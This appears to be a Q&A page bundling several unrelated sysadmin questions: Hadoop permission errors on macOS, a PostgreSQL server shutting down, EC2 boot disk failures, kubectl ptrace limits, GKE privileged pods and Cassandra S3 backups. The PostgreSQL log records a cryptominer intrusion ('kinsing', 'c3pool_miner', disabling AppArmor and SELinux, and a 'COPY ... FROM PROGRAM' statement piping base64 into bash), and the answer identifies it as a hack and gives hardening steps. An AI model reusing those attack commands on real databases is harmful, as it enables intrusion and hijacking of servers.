If I try to start Hadoop in my Mac terminal, it shows "Operation not permitted" - hadoop3

Starting namenodes on [localhost]
localhost: bash: /Users/gauravgadhave/Desktop/Bigdata_install/hadoop-3.2.2/bin/hdfs: Operation not permitted
Starting datanodes
localhost: bash: /Users/gauravgadhave/Desktop/Bigdata_install/hadoop-3.2.2/bin/hdfs: Operation not permitted
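One common cause on recent macOS versions (an assumption here, not something confirmed by the output above) is that the downloaded Hadoop files still carry the quarantine attribute, or that Terminal lacks permission to execute files under ~/Desktop. A quick check along these lines may help:

    # Sketch: inspect and remove the macOS quarantine attribute from the install.
    # The path is taken from the error message above.
    HADOOP_HOME="/Users/gauravgadhave/Desktop/Bigdata_install/hadoop-3.2.2"
    xattr -l "$HADOOP_HOME/bin/hdfs"                  # look for com.apple.quarantine
    xattr -r -d com.apple.quarantine "$HADOOP_HOME"   # remove it recursively

If no quarantine attribute is present, granting Terminal Full Disk Access under System Preferences > Security & Privacy > Privacy, or moving the install out of ~/Desktop, are the other usual workarounds.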

Related

Postgresql database server keeps shutting down randomly [closed]

Over the last two days, my Postgres database server has shut down unexpectedly five or six times, often when server traffic was at its lowest level.
So I checked the PostgreSQL log:
2021-09-18 10:17:36.099 GMT [22856] LOG: received smart shutdown request
2021-09-18 10:17:36.111 GMT [22856] LOG: background worker "logical replication launcher" (PID 22863) exited with exit code 1
grep: Trailing backslash
kill: (28): Operation not permitted
2021-09-18 10:17:39.601 GMT [55614] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.603 GMT [55622] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.686 GMT [55635] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.688 GMT [55636] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.718 GMT [55642] XXX#XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.720 GMT [55643] XXX#XXX FATAL: the database system is shutting down
kill: (55736): No such process
kill: (55741): No such process
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Failed to stop c3pool_miner.service: Interactive authentication required.
See system logs and 'systemctl status c3pool_miner.service' for details.
pkill: killing pid 654 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
bash: line 525: docker: command not found
bash: line 526: docker: command not found
bash: line 527: docker: command not found
bash: line 528: docker: command not found
bash: line 529: docker: command not found
bash: line 530: docker: command not found
bash: line 531: docker: command not found
bash: line 532: docker: command not found
bash: line 533: docker: command not found
bash: line 534: docker: command not found
bash: line 547: setenforce: command not found
bash: line 548: /etc/selinux/config: Permission denied
Failed to stop apparmor.service: Interactive authentication required.
See system logs and 'systemctl status apparmor.service' for details.
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Failed to reload daemon: Interactive authentication required.
update-rc.d: error: Permission denied
Failed to stop aliyun.service.service: Interactive authentication required.
See system logs and 'systemctl status aliyun.service.service' for details.
Failed to disable unit: Interactive authentication required.
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
2021-09-18 10:17:49.860 GMT [54832] admin#postgres FATAL: terminating connection due to administrator command
2021-09-18 10:17:49.860 GMT [54832] admin#postgres CONTEXT: COPY uegplqsl, line 1: "/tmp/kinsing exists"
2021-09-18 10:17:49.860 GMT [54832] admin#postgres STATEMENT: DROP TABLE IF EXISTS XXX;CREATE TABLE XXX(cmd_output text);COPY XXXFROM PROGRAM 'echo ... |base64 -d|bash';SELECT * FROM XXX;DROP TABLE IF EXISTS XXX;
2021-09-18 10:17:49.877 GMT [22858] LOG: shutting down
2021-09-18 10:17:49.907 GMT [22856] LOG: database system is shut down
I learned it could be another process sending SIGTERM, SIGINT, or SIGQUIT to the database server, so I used SystemTap to catch any signal that shuts the database server down. After PostgreSQL shut down again, I got this:
Now I have the PIDs of the processes that are sending the shutdown signals. What can I do to prevent this from happening again?
The VPS operating system is Ubuntu 20.04.3 LTS. The backend is written in Django and the database is PostgreSQL 12.
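For reference, a signal trace of the kind described above can be done with a short SystemTap script along these lines (a sketch, not necessarily the exact script used; it only logs which process sends termination signals and to whom):

    # sigmon.stp (sketch) - run with: sudo stap sigmon.stp
    probe signal.send {
        if (sig_name == "SIGTERM" || sig_name == "SIGINT" || sig_name == "SIGQUIT") {
            printf("%s sent to %s (pid %d) by %s (pid %d, uid %d)\n",
                   sig_name, pid_name, sig_pid, execname(), pid(), uid())
        }
    }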
You have been hacked. Rebuild the system, and this time pick a strong password for your superuser. Don't let anyone log on from the outside at all unless that is necessary, and if it is, don't let them do so as the superuser.
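A minimal sketch of those steps on the rebuilt server ('postgres' is the default superuser name, and 'appdb', 'appuser', and the client address are placeholders):

    # 1. Give the superuser a strong password
    sudo -u postgres psql -c "ALTER USER postgres WITH PASSWORD 'a-long-random-password';"
    # 2. In pg_hba.conf, keep the superuser local-only and allow the application
    #    role only from the application server; remove any "0.0.0.0/0" trust/md5 lines:
    #      local   all     postgres                    peer
    #      host    all     postgres   127.0.0.1/32     scram-sha-256
    #      host    appdb   appuser    10.0.0.5/32      scram-sha-256
    # 3. Reload the configuration
    sudo -u postgres psql -c "SELECT pg_reload_conf();"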

aws ec2 ssh fails after creating an image of the instance

I regularly create an image of a running instance without stopping it first. That has worked for years without any issues. Tonight, I created another image of the instance (without any changes to the virtual server settings except for a "sudo yum update -y") and noticed my SSH session was closed. It looked like the instance had been rebooted after the image was created. Then the web console showed 1/2 status checks passed. I rebooted it a few times and the status remained the same. The log showed:
Setting hostname localhost.localdomain: [ OK ]
Setting up Logical Volume Management: [ 3.756261] random: lvm: uninitialized urandom read (4 bytes read)
WARNING: Failed to connect to lvmetad. Falling back to device scanning.
[ OK ]
Checking filesystems
Checking all file systems.
[/sbin/fsck.ext4 (1) -- /] fsck.ext4 -a /dev/xvda1
/: clean, 437670/1048576 files, 3117833/4193787 blocks
[/sbin/fsck.xfs (1) -- /mnt/pgsql-data] fsck.xfs -a /dev/xvdf
[/sbin/fsck.ext2 (2) -- /mnt/couchbase] fsck.ext2 -a /dev/xvdg
/sbin/fsck.xfs: XFS file system.
fsck.ext2: Bad magic number in super-block while trying to open /dev/xvdg
/dev/xvdg:
The superblock could not be read or does not describe a valid ext2/ext3/ext4
[ 3.811304] random: crng init done
filesystem. If the device is valid and it really contains an ext2/ext3/ext4
filesystem (and not swap or ufs or something else), then the superblock
is corrupt, and you might try running e2fsck with an alternate superblock:
e2fsck -b 8193 <device>
or
e2fsck -b 32768 <device>
[FAILED]
*** An error occurred during the file system check.
*** Dropping you to a shell; the system will reboot
*** when you leave the shell.
/dev/fd/9: line 2: plymouth: command not found
Give root password for maintenance
(or type Control-D to continue):
It looked like /dev/xvdg failed the disk check. I detached the volume from the instance and rebooted. I still couldn't SSH in. I re-attached it and rebooted. Now it says 2/2 status checks passed, but I still can't SSH back in, and the log still shows the same issues with /dev/xvdg as above.
Any help would be appreciated. Thank you!
Thomas
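One avenue worth trying (a sketch, not a confirmed fix): attach the problem volume to a healthy instance and run the alternate-superblock check the boot log itself suggests. The device name after re-attachment is an assumption and should be verified with lsblk; if the volume was never ext2/3/4 at all, the fix is the /etc/fstab entry (correct the filesystem type or add nofail) rather than e2fsck.

    # On a rescue/second instance with the volume attached:
    lsblk                               # confirm the device name first
    sudo e2fsck -f /dev/xvdg            # normal forced check
    sudo e2fsck -b 32768 /dev/xvdg      # alternate superblock, as the log suggests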

Can't attach gdbserver to process through kubectl

It looks like I have some sort of permissions problem with kubectl. I have a Docker image that contains a server with a native dynamic library plus gdbserver. When I debug the Docker container running on my local machine, everything is fine. I'm using the following workflow:
start gdb
target remote | docker exec -i CONTAINER gdbserver - --attach PID
set sysroot /path/to/local/binary
Good to go!
But when I try the same operation through kubectl, I get the following error:
Cannot attach to lwp 7: Operation not permitted (1)
Exiting
Remote connection closed
The only difference is step 2:
target remote | kubectl exec -i POD -- gdbserver - --attach PID
I think you might need to add the ptrace capability and a suitable seccomp profile in your YAML file.
--cap-add sys_ptrace
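In a pod manifest that translates to roughly the following (a sketch; the pod and container names and the image are placeholders for your own spec):

    apiVersion: v1
    kind: Pod
    metadata:
      name: debug-pod
    spec:
      containers:
      - name: server
        image: your-registry/server-with-gdbserver:latest   # placeholder
        securityContext:
          capabilities:
            add: ["SYS_PTRACE"]
          # If the default seccomp profile still blocks ptrace (Kubernetes 1.19+):
          # seccompProfile:
          #   type: Unconfined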

Kernel error when trying to start an NFS server in a container

I was trying to run through the NFS example in the Kubernetes codebase on Container Engine, but I couldn't get the shares to mount. It turns out that every time the nfs-server pod is launched, the kernel throws an error:
Apr 27 00:11:06 k8s-cluster-6-node-1 kernel: [60165.482242] ------------[ cut here ]------------
Apr 27 00:11:06 k8s-cluster-6-node-1 kernel: [60165.483060] WARNING: CPU: 0 PID: 7160 at /build/linux-50mAO0/linux-3.16.7-ckt4/fs/nfsd/nfs4recover.c:1195 nfsd4_umh_cltrack_init+0x4a/0x60 nfsd
Full output here: http://pastebin.com/qLzCFpAa
Any thoughts on how to solve this?
The NFS example doesn't work because GKE (by default) doesn't support running privileged containers, such as the nfs-server. I just tested this with a v0.16.0 cluster and kubectl v0.15.0 (the current gcloud default) and got a nice error message when I tried to start the nfs-server pod:
$ kubectl create -f nfs-server-pod.yaml
Error: Pod "nfs-server" is invalid: spec.containers[0].privileged: forbidden 'true'
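For reference, the setting GKE is rejecting is the container's privileged flag; the error message shows the old spec.containers[0].privileged field, which in current manifests lives under securityContext. A fragment of such a spec (container name and image are placeholders, not the exact example manifest) looks like:

    spec:
      containers:
      - name: nfs-server
        image: <nfs-server-image>   # placeholder
        securityContext:
          privileged: true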

How to take data backup using cassandra-snapshotter?

I have to back up the data on my Cassandra nodes and upload it to Amazon S3. When I execute the following command,
cassandra-snapshotter --aws-access-key-id=**** --aws-secret-access-key=**** --s3-bucket-name=inblox-exp-buck --s3-bucket-region=ap-southeast-2 --s3-base-path=test1 backup --hosts=52.64.45.152,52.64.28.145 --user=ubuntu
I get the following error:
[52.64.45.152] Executing task 'node_start_backup'
[52.64.28.145] Executing task 'node_start_backup'
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Fatal error: One or more hosts failed while executing task 'node_start_backup'
Aborting.
[52.64.45.152] Executing task 'clear_node_snapshot'
[52.64.28.145] Executing task 'clear_node_snapshot'
[52.64.28.145] sudo: /usr/bin/nodetool clearsnapshot -t "20150416144918"
[52.64.45.152] sudo: /usr/bin/nodetool clearsnapshot -t "20150416144918"
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.28.145), but input would be ambiguous in parallel mode
Fatal error: Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Aborting.
Needed to prompt for a connection or sudo password (host: 52.64.45.152), but input would be ambiguous in parallel mode
Fatal error: One or more hosts failed while executing task 'clear_node_snapshot'
Aborting.
One or more hosts failed while executing task 'clear_node_snapshot'
What is happening here? How do I fix this problem?
cassandra-snapshotter uses SSH to reach each host, so make sure your 'ubuntu' user's RSA public key is listed in the .ssh/authorized_keys file on every node. Optionally, you can turn off the SSH option in the code, but only if a password is required to access the hosts.
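A minimal way to do that from the machine running the backup (a sketch, assuming key-based SSH as the 'ubuntu' user and the hosts from the question; on EC2 you can also just pass --sshkey with your .pem file, as the last answer below shows):

    # Append the backup machine's public key to each node's authorized_keys,
    # using the instance's original .pem key for the initial connection.
    ssh -i YOUR_PEM_FILE.pem ubuntu@52.64.45.152 'cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub
    ssh -i YOUR_PEM_FILE.pem ubuntu@52.64.28.145 'cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub
    # Verify non-interactive access before re-running the backup
    ssh ubuntu@52.64.45.152 'nodetool version'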
I ran into the same problem and solved it by passing the password as well.
For help:
$ cassandra-snapshotter backup -h
Your command should look like:
cassandra-snapshotter --aws-access-key-id=**** --aws-secret-access-key=**** --s3-bucket-name=inblox-exp-buck --s3-bucket-region=ap-southeast-2 --s3-base-path=test1 backup --hosts=xx.xx.xx.xx,xx.xx.xx.xx --user=ubuntu --password=*****
With this I am able to take the backup.
Setup:
3-node cluster
A separate machine that runs the backup command
All are AWS EC2 machines.
I used the command below:
cassandra-snapshotter --s3-bucket-name=BUCKET_NAME \
--s3-bucket-region=us-east-1 \
--s3-base-path=CLUSTER_BACKUP \
--aws-access-key-id=KEY \
--aws-secret-access-key=SECRET \
backup \
--hosts=PUBLIC_IP_1,PUBLIC_IP_2,PUBLIC_IP_3 \
--sshkey=YOUR_PEM_FILE.pem